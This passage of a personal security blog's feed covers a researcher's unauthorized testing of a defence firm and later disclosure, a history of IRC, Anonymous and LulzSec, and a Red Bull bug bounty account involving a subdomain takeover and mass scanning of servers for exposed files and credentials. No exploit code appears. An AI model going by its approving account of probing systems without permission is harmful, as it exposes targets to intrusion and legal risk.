<li>Protect Yourself Online</li>
<li>Essential Cyber Security for Remote Workers 1 &#x2013; Intro to Cyber Security</li>
<li>Essential Cyber Security for Remote Workers 3 &#x2013; Terminology &amp; Technology</li>
<li>Introduction to Network Technologies</li>
<li>Introduction to Operating Systems</li>
<li>Introduction to Cyber Investigations</li>
</ol>
<!--kg-card-end: markdown--><h3 id="leaderboard">Leaderboard</h3><p></p><ul><li><strong>Organization</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1892" height="979" srcset="https://flaviu.io/content/images/size/w600/2020/11/image.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image.png 1600w, https://flaviu.io/content/images/2020/11/image.png 1892w" sizes="(min-width: 720px) 720px"><figcaption>proud #1 from my organization immersive labs (359 records)</figcaption></figure><ul><li><strong>Global Ranking</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-1.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1873" height="977" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-1.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-1.png 1600w, https://flaviu.io/content/images/2020/11/image-1.png 1873w" sizes="(min-width: 720px) 720px"><figcaption>proud #130 in global ranking (21,187 records)</figcaption></figure><ul><li><strong>League Table</strong></li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/11/image-2.png" class="kg-image" alt="Immersive Labs #1" loading="lazy" width="1871" height="952" srcset="https://flaviu.io/content/images/size/w600/2020/11/image-2.png 600w, https://flaviu.io/content/images/size/w1000/2020/11/image-2.png 1000w, https://flaviu.io/content/images/size/w1600/2020/11/image-2.png 1600w, https://flaviu.io/content/images/2020/11/image-2.png 1871w" sizes="(min-width: 720px) 720px"><figcaption>proud #13 in league table (939 records)</figcaption></figure><p></p><!--kg-card-begin: html--><a href="https://flaviu.io/content/images/data/Activity-Report.pdf">View My Activity Report Here</a>
<!--kg-card-end: html--><!--kg-card-begin: markdown--><p>Have you got any suggestions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The Grey area of Hacking]]></title><description><![CDATA[Grey area of hacking, what happens when you find a vulnerability in a multi-billion pound company with no disclosure policy?  ]]></description><link>https://flaviu.io/the-grey-area-of-hacking/</link><guid isPermaLink="false">5f8e10be1679673a38c4b2b7</guid><category><![CDATA[hacking]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 26 Oct 2020 18:36:35 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/10/greyhat-3.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/white-gray.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="640" height="427" srcset="https://flaviu.io/content/images/size/w600/2020/10/white-gray.jpg 600w, https://flaviu.io/content/images/2020/10/white-gray.jpg 640w"><figcaption>White / Gray ?</figcaption></figure><hr><img src="https://flaviu.io/content/images/2020/10/greyhat-3.png" alt="The Grey area of Hacking"><p>In life, there are debates, debates that seem to go on forever with never a definitive conclusion in sight. Theses debates like many other spans on over centuries and give what is known as &quot;age-old questions&quot; one such question in Ethical Hacking is &quot;When does white, become grey?&quot; Some say when your intentions change from ethical to unethical, some say when you do something you have not had permission for, no matter what your intentions are. Regardless of what our individual opinions are there are laws and that is what defines our grey area, the most well known relevant act is the <em>Computer Misuse Act 1990</em>, which brings in three offences:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/balance-law.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2020/10/balance-law.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/balance-law.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/balance-law.jpg 1600w, https://flaviu.io/content/images/2020/10/balance-law.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption><b>balance</b> and harmony.</figcaption></figure><ol><li>Unauthorized access to computer material.</li><li>Unauthorized access with intent to commit or facilitate the commission of further offences.</li><li>Unauthorized acts with intent to impair, or with recklessness as to impairing, operation of a computer, etc.</li></ol><p>This act has since been amended twice, by the <a href="http://www.legislation.gov.uk/ukpga/2006/48/contents">Police and Justice Act 2006</a> and by the <a href="http://www.legislation.gov.uk/ukpga/2015/9">Serious Crime Act 2015</a> &#x2013; this introduced:</p><p>3ZA.Unauthorised acts causing or creating a risk of, serious damage.3A. Making, supplying or obtaining articles for use in the offence under section 1, 3 or 3ZA.</p><p>All these offences carry a different prison sentence with offence 1) and 3A) having a possible sentence of 2 years imprisonment, offence 2) is five years imprisonment, 3) is 10 years, and lastly offence 3ZA) is the most serious crime covered by this act and has a maximum sentence of life.</p><hr><blockquote><em>Before we move on please see /<a href="https://flaviu.io/disclaimer/">disclaimer</a>/</em></blockquote><p>So here I am sitting at my desk with this bug that I have just confirmed, knowing this could potentially be exploited by a Blackhat hacker to the extent of where the company&apos;s security is at risk, or even worse, end up being held for <a href="https://www.acronis.com/en-gb/articles/ransomware-attacks/">ransom since this is very common in 2020.</a></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/law-hammer.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1061" srcset="https://flaviu.io/content/images/size/w600/2020/10/law-hammer.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/law-hammer.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/law-hammer.jpg 1600w, https://flaviu.io/content/images/2020/10/law-hammer.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption><strong><em>The</em> <em>gavel!</em></strong></figcaption></figure><p>By looking at the above laws, my case would fall into category 1) since I did not have permission for testing, therefore I was unable to disclose this vulnerability that affected them.</p><p><br>So what do I do? Should I just ignore it and go on with the rest of my day?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/dad.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1920" height="1372" srcset="https://flaviu.io/content/images/size/w600/2020/10/dad.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/dad.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/dad.jpg 1600w, https://flaviu.io/content/images/2020/10/dad.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Proud father of 2 toddlers</figcaption></figure><p>I think this is many researcher&apos;s dilemma if you remember the case where two Pentesters had written authorization to test the physical security and were later arrested on felony third-degree burglary charges. (Currently, the charges have been dropped.)</p><p>Take another example only a few weeks previously I remember reading a post on LinkedIn where a company that specializes in mobile app Pentesting had looked into an application and found a critical vulnerability where users data was at risk of being breached. Said Pentester contacted the owner of the application but their report was ignored, the Pentester then went public with their findings which caused the company to deny any allegations which started a dispute between the two parties.</p><p>Here are a couple more grey hat hackers examples <a href="https://www.thesslstore.com/blog/mysterious-russian-grey-hat-vigilante-patched-over-100000-routers/">here</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/10/dillemma-1.jpg" class="kg-image" alt="The Grey area of Hacking" loading="lazy" width="1000" height="662" srcset="https://flaviu.io/content/images/size/w600/2020/10/dillemma-1.jpg 600w, https://flaviu.io/content/images/2020/10/dillemma-1.jpg 1000w" sizes="(min-width: 720px) 720px"><figcaption>dilemma</figcaption></figure><!--kg-card-begin: markdown--><p>I believe all the companies and the current legislation should enable researchers to safely undertake <mark>some analysis</mark> and therefore support businesses, especially those who cannot afford testing and are at huge risk from being hacked.</p>
<!--kg-card-end: markdown--><p>In the end, I decided to do what was best according to the values that I hold and disclose the information. I knew there was potential for the company in question to be rather annoyed, and they had every right to be according to the law. However I knew my intentions were honourable and hoped that would stand me in good stead and they wouldn&apos;t be too annoyed to the extent that they would report me, but you never know who is at the other side of the computer and therefore you will never know how they will react.</p><!--kg-card-begin: markdown--><h6 id="inregardstothevulnerabilityifoundiamtalkingaboutabritishmultinationalengineeringanddefencebusinesswithanetworthofover16billionpounds">In regards to the vulnerability, I found I am talking about a British multinational engineering and defence business, with a net worth of over 16 billion pounds.</h6>
<!--kg-card-end: markdown--><hr><p>This particular company did not have a vulnerability disclosure policy in place at the time of my findings. The person whom I approached to report my findings was very polite and professional, they are the Cyber Incident Lead at the company in question.</p><p>They helped me by sharing the details of their SOC where I could send my report, this e-mail in question is not openly shared on the web.</p><p>I could only imagine how busy a person with such responsibility could be, so I left them to it not thinking &quot;<em>what did I just start.&quot;</em></p><p>A couple months went by, and of course, I received some updates along the way stating that the cyber department is still working on the matter. It soon came to light that my action prompted the company to perform analysis on all their domains which could be in the hundreds of thousands, at the same time they rolled out their vulnerability disclosure policy.</p><p>This was later confirmed when I received the following.</p><blockquote>&quot;We were already rolling out the vulnerability disclosure policy, but your engagement was nicely timed to validate the need for external parties having a viable and approved entry into the business.&quot;</blockquote><h3 id="conclusion">Conclusion</h3><hr><ul><li>The company has fixed the flaw I reported and has since checked all their assets for such vulnerabilities.</li><li>I have met some wonderful people and made connections within the IT industry. </li><li>The company has put in place their vulnerability disclosure policy which is awesome, now researchers are legally allowed to report bugs they find within the scope of the program.</li><li> I became more careful when engaging in tests especially regarding what policies and programs are in place.</li><li>This opportunity enabled me to look at the wider issue of the current legislation preventing the white hat/pentest community from undertaking some analysis.</li><li>The Head of the Department at my University has been informed about my encounter with the company and they are aware of the value I added.</li><li>I received an amazing book and cannot wait to read it.</li></ul><hr><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/10/sandworm-2.jpg" width="2000" height="2667" loading="lazy" alt="The Grey area of Hacking" srcset="https://flaviu.io/content/images/size/w600/2020/10/sandworm-2.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/10/sandworm-2.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/10/sandworm-2.jpg 1600w, https://flaviu.io/content/images/size/w2400/2020/10/sandworm-2.jpg 2400w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2020/10/sandworm2-4.png" width="1000" height="1326" loading="lazy" alt="The Grey area of Hacking" srcset="https://flaviu.io/content/images/size/w600/2020/10/sandworm2-4.png 600w, https://flaviu.io/content/images/2020/10/sandworm2-4.png 1000w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin&apos;s Most Dangerous Hackers</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Internet Relay Chat And Hackers]]></title><description><![CDATA[We Are Anonymous.
We Are Legion.
We do not forgive.
We do not forget.
Expect us.]]></description><link>https://flaviu.io/internet-relay-chat-and-hackers/</link><guid isPermaLink="false">5f6d9dba1679673a38c4aec8</guid><category><![CDATA[hacking]]></category><category><![CDATA[irc]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Sun, 27 Sep 2020 21:15:48 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/09/network.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/09/network.jpg" alt="Internet Relay Chat And Hackers"><p>In this article I will talk about IRC, a very common server software. Ever since my adolescence I&apos;ve been on and around IRC, it&apos;s just something I&apos;ll never forget about. Perhaps this is where my offensiveness comes from.</p><h3 id="-the-past-beats-inside-me-like-a-second-heart-">&#x201C;The past beats inside me like a second heart.&#x201D;<br></h3><h3 id="what-is-irc">What is IRC?</h3><hr><p><strong>IRC</strong> is an open protocol that uses TCP and, optionally, TLS. An <strong>IRC server</strong> can connect to other <strong>IRC servers</strong> to expand the <strong>IRC</strong> network. Users access <strong>IRC</strong> networks by connecting a client to a <strong>server</strong>. There are many client implementations, such as mIRC, HexChat and irssi, and <strong>server</strong> implementations, e.g. the original IRCd.</p><p>An IRCd, short for Internet Relay Chat daemon, is server software that implements the IRC protocol, enabling people to talk to each other via the Internet.</p><h3 id="irc-clients">IRC CLIENTS</h3><hr><p>My go to client for Windows usage would be mIRC, this client only runs on the Windows operating system, so it will not work on Linux.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-11.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="760" height="504" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-11.png 600w, https://flaviu.io/content/images/2020/09/image-11.png 760w" sizes="(min-width: 720px) 720px"><figcaption>mIRC client - Windows</figcaption></figure><p>But if you are on Linux you&apos;d want to pick between irssi or Xchat, these clients also work on Windows and of course there are more options to pick from. It&apos;s all about your preferences in terms of simplicity and graphics.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-10.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="885" height="576" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-10.png 600w, https://flaviu.io/content/images/2020/09/image-10.png 885w" sizes="(min-width: 720px) 720px"><figcaption>XChat - freenode server - Linux</figcaption></figure><h3 id="mirc-and-xchat-creators">mIRC and Xchat creators</h3><hr><p><strong>mIRC - Khaled Mardam-Bey</strong>, the developer of mIRC. Started working on mIRC in 1994 while studying for a Cognitive Science degree at the University of Westminster in London, where he first learned about the Internet.</p><p><strong>XChat</strong> is the project of one man, Peter &#x17D;elezn&#xFD; also known as zed. <strong>XChat</strong> was initially developed as a Unix/Linux GTK application, however <strong>XChat</strong> now works on Windows too, this was due to being in such a high demand.</p><h3 id="connecting-to-irc-servers">Connecting to IRC servers</h3><hr><p>The largest IRC networks have traditionally been grouped as the &quot;Big Four&quot;</p><p>The &quot;Big Four&quot; were:</p><ul><li>EFnet</li><li>IRCnet</li><li>UnderNet</li><li>DALnet</li></ul><p>Some statistics:</p><p>IRC reached 16 million users in 2001 and 10 million users in 2003.</p><p>Here are some of the largest IRC networks:</p><ul><li>freenode </li><li>IRCnet</li><li>EFnet</li><li>Undernet</li><li>QuakeNet</li><li>Rizon</li><li>OFTC</li><li>DALnet</li></ul><h3 id="latest-news-about-irc">Latest news about IRC</h3><p>Internet Relay Chat (IRC) has lost 60% of its users, from 10 million in 2003 to about 400,000 today. In 2003 there were 500,000 channels; now there is half that number. This is mainly due in large part to the advent of the Web, social media platforms, and other software that is more interactive and can do a lot more than plain text can do.</p><h3 id="irc-is-not-dead-the-interesting-part-">IRC IS NOT DEAD. [THE INTERESTING PART]</h3><hr><p>So if you may wonder what happens over on IRC servers, right now you&apos;ll be able to find all kind of servers ranging from seeking help with your project (e.g Freenode, previously known as Open Projects Network, is an IRC network used to discuss peer-directed projects.) or if you just want to hang out and talk to people you could try (DALnet). Let&apos;s not forget iRC servers have been the home for many <strong>hackers </strong>for a very long time, you could find some old school hackers on UnderNet however many of those guys will run private servers and hide from the world.</p><hr><blockquote>&#x201C;Scars have the strange power to remind us that our past is real.&#x201D;</blockquote><p><strong>1337 THE HACKER COLLECTIVE</strong> </p><p>The birth of Anonymous itself was sporadic and amorphous. It was created over several years, the beginning was around 2006 on the popular 4chan message board and in Internet Relay Chat channels. The first Anons were in it for the lulz&#x2013;simple amusement.</p><p>Anonymous and its factions LulzSec and AntiSec drew widespread attention between 2008 and 2012 as they tore loudly through the internet ruthlessly hacking websites, exposing corporate secrets, raiding email spools, and joining the fight of the &quot;We are the <em><strong>99</strong></em>%&quot;. The groups appeared to be unstoppable as they attacked one target after another, more than 200 in all by the government&apos;s count. It seemed nobody was beyond their grasp.</p><p>Just as Anonymous gained mainstream notoriety, however, it seemed to disappear. Little was heard from the group again until 2010, when Anonymous defended the cause of file-sharers with DDoS attacks aimed at the Motion Picture Association of America and others. But the move that really got the group attention was Operation: Payback, a series of DDoS attacks against PayPal, Visa and MasterCard for their refusal to process donations to WikiLeaks after the site began publishing the leaks of <em>Chelsea Manning</em> also Operation Last Resort, which targeted the U.S. Sentencing Commission and MIT websites to protest the unusually harsh prosecution of internet activist <em>Aaron Swartz</em>, Anonymous has gone silent for the most part.</p><p>When WikiLeaks drew attention to the DDoS attacks, interest in Anonymous grew exponentially. Participation on the public channel where members and spectators communicated jumped tenfold from 700 to 7,000 people.</p><p>I personally remember the AnonOps IRC server which I believe it still exists to this day, They were using Etherpad to keep the participants updated on the current Operations. Etherpad is a web application that allows for real-time group collaboration of text documents.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/anon.jpg" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2020/09/anon.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/anon.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/anon.jpg 1600w, https://flaviu.io/content/images/2020/09/anon.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Anonymous Hacking Group</figcaption></figure><p>The group was undone in part by Hector Xavier Monsegur, known online by the <em>nom de hack</em> <strong>Sabu</strong>.</p><p>Check <a href="https://en.wikipedia.org/wiki/Timeline_of_events_associated_with_Anonymous">this </a>if you are curious to see all the <strong>Ops </strong>that were carried out by the Anonymous hacking group.</p><hr><p><strong>LulzSec</strong>? Sure!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-13.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="300" height="340"><figcaption>LulzSec Hacking Group</figcaption></figure><p>Lulz Security, abbreviated as <strong><em>LulzSec</em></strong>, was a black hat computer hacking group that claimed to be responsible for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline.</p><p>One of the founders of LulzSec was identified by Backtrace Security in 2011 in a PDF publication named &quot;Namshub&quot;. <strong>Hector Xavier Monsegur.</strong></p><p><strong>Sabu </strong>featured prominently in the group&apos;s published IRC chats. <em>The Economist</em> referred to Sabu as one of LulzSec&apos;s six core members and their &quot;most expert&quot; hacker.</p><p>He later helped law enforcement track down other members of the organization as part of a plea deal. At least four associates of LulzSec were arrested in March 2012 as part of this investigation. British authorities had previously announced the arrests of two teenagers they allege are LulzSec members T-flow and Topiary.</p><p>At just after midnight on 26 June 2011, LulzSec released a &quot;50 days of lulz&quot; statement, which they claimed to be their final release, confirming that LulzSec consisted of six members, and that their website is to be shut down. This breaking up of the group was unexpected.</p><p>Those who have followed the movement closely have said Sabu&apos;s participation in the arrest of Jeremy Hammond and others has had a chilling effect on Anonymous, causing members to lay low and worry if additional informants are lurking among them.</p><p>Below are chatroom logs of discussions between the hackers involved in LulzSec. </p><pre><code class="language-ascii">. /$$                 /$$            /$$$$$$
.| $$                | $$           /$$__  $$
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!

   __
   )|     ________________________.------,_ _
 _/o|_____/  ,____________.__;__,__,__,__,_Y...:::---===````//    #anonymous
|==========\ ;  ;  ;  ;  ; \__,__\__,_____ --__,-.\   OFF  ((     #lulzsec
           `----------|__,__/__,__/__/  )=))~((   &apos;-\  THE  \\    #antisec
                        \ ==== \          \\~~\\     \  PIGS \\   
                        `| === |           ))~~\\     ```&quot;&quot;&quot;=,))  
                         | === |           |&apos;---&apos;)                
                        / ==== /           `=====&apos;
                       &#xB4;------&#xB4;</code></pre><ul><li><a href="https://flaviu.io/content/images/log/lulzsec.txt">Log.txt</a> - Tensions Inside The Group &apos;for the lulz&apos;</li></ul><h2 id="identity-sabu-">Identity [Sabu]</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-14.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="2000" height="1333" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-14.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-14.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-14.png 1600w, https://flaviu.io/content/images/size/w2400/2020/09/image-14.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><strong>Hector Xavier Monsegur aka Sabu</strong></figcaption></figure><p>At the time of his arrest Xavier was 28-year-old, unemployed and facing a sentence of 124 years in prison.</p><p>Xavier served 7 months in prison after his arrest but had been free since then while awaiting sentencing. At his sentencing on May 27, 2014, he was given &quot;time served&quot; for co-operating with the FBI and set free under one year of probation.</p><p>Anonymous reacted to Sabu&apos;s unmasking and betrayal of LulzSec on Twitter, &quot;#Anonymous is a hydra, cut off one head and we grow two back&quot;.</p><p>If you would like to learn more about Anonymous, here are some suggested reading materials: We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency</p><p>OR</p><p>Here is my own copy of &quot;The Many Faces of Anonymous&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-15.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="2000" height="2667" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-15.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-15.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-15.png 1600w, https://flaviu.io/content/images/size/w2400/2020/09/image-15.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>The Many Faces Of Anonymous - Book</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[My Journey With Red Bull]]></title><description><![CDATA[They say the devil makes work for idol hands and there has never been a more apt saying. With the summer practically spent in lockdown and all caught on up on my University work I decided.....]]></description><link>https://flaviu.io/my-bug-bounty-journey-with-redbull/</link><guid isPermaLink="false">5f636c271679673a38c4ab95</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[hacking]]></category><category><![CDATA[subdomaintakeover]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 21 Sep 2020 17:33:23 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/09/redbull2-1.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/09/redbull2-1.jpg" alt="My Journey With Red Bull"><p>They say <em>the devil makes work for idol</em> hands and there has never been a more apt saying. With the summer practically spent in lockdown and all caught on up on my University work I decided it would be the right time to start a blog. Like anything you put out there on the internet it needed content and lots of it. It was then I decided to put to test some of the skills I had learnt so far from University and what I had taught myself. This led me to subdomain takeovers which I have covered in a previous post and from there bug bounties.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/redbull3.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1277" srcset="https://flaviu.io/content/images/size/w600/2020/09/redbull3.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/redbull3.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/redbull3.jpg 1600w, https://flaviu.io/content/images/2020/09/redbull3.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>&quot;<b>Red Bull gives you wings</b>&quot;</figcaption></figure><p>There is a stark contrast between pentesting labs e.g hackthebox and bug bounties on real world targets. Having spent a lot of my time on these labs where vulnerabilities are carefully placed within challenges I had an understanding of how to solve them. I was hopeful that, I will be fine finding bugs in the real world, and boy was I wrong. I remember seeing an announcement by HackerOne saying they had reached 300,000 registered hackers on their platform and I was thinking ..oh wow&#x2026; so much competition. That is very true, there is a lot of hackers and you will submit reports that turn out to be duplicates.</p><p>A couple good deeds and my bug bounties not that they were bountiful at all ranged from the GOV/Military and NHS to top 500 fortune companies to name a few (Garmin &amp; Accenture Hall of Fame). Coming back to the intended article I remember watching Formula 1 on Netflix one weekend and that is when the thought came to me <em>&#x201C;I wonder if Red Bull has a bug bounty programme&#x201D;</em> luckily I found that they have a Vulnerability Disclosure Program. I decided to set to work and see what vulnerabilities I could find within their companies&#x2019; website. Since I am still a beginner and everything is a learning curve for me I could only test for a few things that I knew how to perform successfully.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-9.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="960" height="982" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-9.png 600w, https://flaviu.io/content/images/2020/09/image-9.png 960w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull Formula 1 Car (RB16)</figcaption></figure><p>Since I had this frenzy going on with subdomain takeovers I decided to look and see if I could find any for Red Bull, long and behold I had found a couple that caught my attention and proceeded to look into those. I had successfully taken next.redbull.com and uploaded a Proof of Concept. Time to get in touch with Red Bull&#x2019;s security team.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/red2.PNG" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="499" srcset="https://flaviu.io/content/images/size/w600/2020/09/red2.PNG 600w, https://flaviu.io/content/images/size/w1000/2020/09/red2.PNG 1000w, https://flaviu.io/content/images/size/w1600/2020/09/red2.PNG 1600w, https://flaviu.io/content/images/2020/09/red2.PNG 1920w" sizes="(min-width: 720px) 720px"><figcaption>Subdomain takeover Red Bull</figcaption></figure><p>This is when Mark was assigned to my report and from that point on I communicated with him directly. I sent a report to him and soon after got a reply, Mark thanked me and it made me quite happy that someone appreciated my work.</p><figure class="kg-card kg-image-card"><img src="https://flaviu.io/content/images/2020/09/image-1.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1163" height="331" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-1.png 1000w, https://flaviu.io/content/images/2020/09/image-1.png 1163w" sizes="(min-width: 720px) 720px"></figure><p>Soon after Mark wrote back thanking me again for my report and telling me that he would want to organize a reward for me. Red Bull does not have a dedicated bug bounty program with pre-defined rewards in place and they don&apos;t see financial compensation as an appropriate way to reward individuals. However, they do practice a culture of individual rewards based on novelty and criticality of findings delivered.</p><figure class="kg-card kg-image-card"><img src="https://flaviu.io/content/images/2020/09/image-2.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1128" height="274" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-2.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-2.png 1000w, https://flaviu.io/content/images/2020/09/image-2.png 1128w" sizes="(min-width: 720px) 720px"></figure><p>For my first bounty I was happy with anything that was rewarded, I am not in a rush for monetary rewards I would rather learn from the experience and have fun doing it.</p><p>While waiting for my reward, due to Covid-19 things got delayed slightly and &#xA0;a couple weeks went by without any delivery. Mark had decided to do something about this and came up with the plan to offer me a voucher to use on <a href="https://redbullshop.com">Red Bull shop</a> (this was an exception and only a one-time reward &#xA0;to honour me). I was excited again because guess what... they have Red Bull Racing merchandise there!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-3.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1833" height="982" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-3.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-3.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-3.png 1600w, https://flaviu.io/content/images/2020/09/image-3.png 1833w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull Shop</figcaption></figure><p>Before my voucher was due to be generated and since I had this one time opportunity for a voucher I had decided over the weekend to take a look over more of Red Bull&apos;s infrastructure and perform different kind of tests. This time I was looking for servers that would be vulnerable to injections and sensitive files.</p><p>I set up all my scripts, all my payloads, all the wordlists, all the targets.. ready to go... hit enter, I&apos;ve launched all this tasks in the background as I knew this will be very laborious and I will end up with many false positives that I would need to check manually. </p><p>Over the weekend I began to inspect all the hits and different files I managed to access and scrape from thousands of servers belonging to Red Bull.</p><p>I took notes on anything interesting to be able to tell the security them afterwards.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-4.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="425" height="247"><figcaption>Red Bull</figcaption></figure><p>While a few alerts were just simple like for example showing phpinfo, they weren&apos;t really disclosing any credentials and others lead me to some debug logs, some interesting dev panels, but nothing was too sensitive yet.. digging digging digging.. a couple hours later I came across some javascript files that had credentials to a FTP account, but they weren&apos;t valid.. hmm.. right.. I suppose it&apos;s still informative to see how they format their username and passwords.</p><figure class="kg-card 